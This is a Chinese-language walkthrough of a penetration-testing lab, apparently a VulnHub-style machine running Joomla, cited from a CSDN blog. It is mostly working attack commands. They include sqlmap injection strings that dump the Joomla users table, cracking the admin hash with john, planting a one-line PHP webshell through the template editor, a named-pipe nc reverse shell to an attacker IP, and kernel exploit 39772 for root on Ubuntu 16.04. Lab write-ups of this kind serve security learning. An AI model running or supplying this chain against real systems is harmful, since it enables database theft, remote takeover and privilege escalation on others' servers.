首先老样子,进行主机发现
nmap -sV -T4 192.168.47.0/24
发现192.168.47.138 开放80 http端口
访问网站主页
可以发现是以joomla框架搭建的网站,于是就可以去搜索与joomla相关的漏洞和资料
首先想到的是 msfconsole 中直接搜索Joomla并利用相关的payload,但是并没有任何效果。
与此同时 同时使用子域名挖掘工具dirb或者御剑之类的扫描网站
收集到了http://192.168.47.138/administrator/index.php
随后尝试使用searchsploit搜索相关payload
居然直接告诉我们使用sqlmap的payload了,必须尝试一下,毕竟也不浪费多少时间
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] –dbs成功嗦到数据库昵称 joomladb 开始嗦表
sqlmap -u "http://192.168.47.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" –tables
sqlmap -u "http://192.168.47.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" –T “#__users”
在这里会告诉我们无法列举出表中的列名,以公共列列出吗? 我们选择y 继续跑
输入1或者直接回车
选择线程数 1 就可以
注意这里,检索出username和password字段即可按ctrl+c停止即可
最终的sqlmap payload如下,如果在中间列举不出表明也可以直接执行下面一段,效果一样但是步骤不全
sqlmap "http://192.168.47.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" -C “username,password” –dump
最终跑出用户名 admin
密码
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu是一段加密 我们可以通过hash解密解出
将密码放在linux的一个文件中 使用john工具来解
得到账号 admin 密码 snoopy可以登陆后台了
寻找可以上传后门木马的地方,写入一句话木马,最终选择创建一个新的shell.php文件 并写入一句话,保存
通过Editing file “/shell.php” in template “beez3”.这句话得知
文件保存路径大概会是/template/beez3/shell.php,尝试蚁剑连接
Ok,连接成功,考虑webshell是一个非持续链接的后门,所以尝试使用蚁剑nc反弹
在蚁剑使用nc反弹
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.47.137 4444 >/tmp/fnc -lvvp 4444接下来是提权 使用searchsploit工具查找Ubuntu 16.04的提权漏洞
unzip 39772.zip 解压提权expcd 39772 进入目录tar -xvf exploit.tar 解压exp压缩包cd ebpf_mapfd_doubleput_exploit 进入exp目录./compile.sh 执行提权文件./doubleput
完结撒花
来源地址:https://blog.csdn.net/IWANnaaa/article/details/127415057
